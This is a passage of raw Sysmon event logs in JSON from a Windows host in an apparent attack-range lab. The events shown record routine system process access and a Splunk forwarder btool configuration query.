05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1689,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1690,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1691,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1692,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1693,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1694,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010B7690300}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010B7690300}","TargetProcessId":"3840","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1695,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.804\r\nProcessGuid: {A837DB8D-01C6-5F25-0000-0010766A0300}\r\nProcessId: 3852\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-01C6-5F25-0000-0010B7690300}\r\nParentProcessId: 3840\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.804","ProcessGuid":"{A837DB8D-01C6-5F25-0000-0010766A0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-01C6-5F25-0000-0010B7690300}","ParentProcessId":"3840","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1696,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010B7690300}\r\nSourceProcessId: 3840\r\nSourceThreadId: 3844\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010766A0300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010B7690300}","SourceProcessId":"3840","SourceThreadId":"3844","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010766A0300}","TargetProcessId":"3852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1697,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010766A0300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 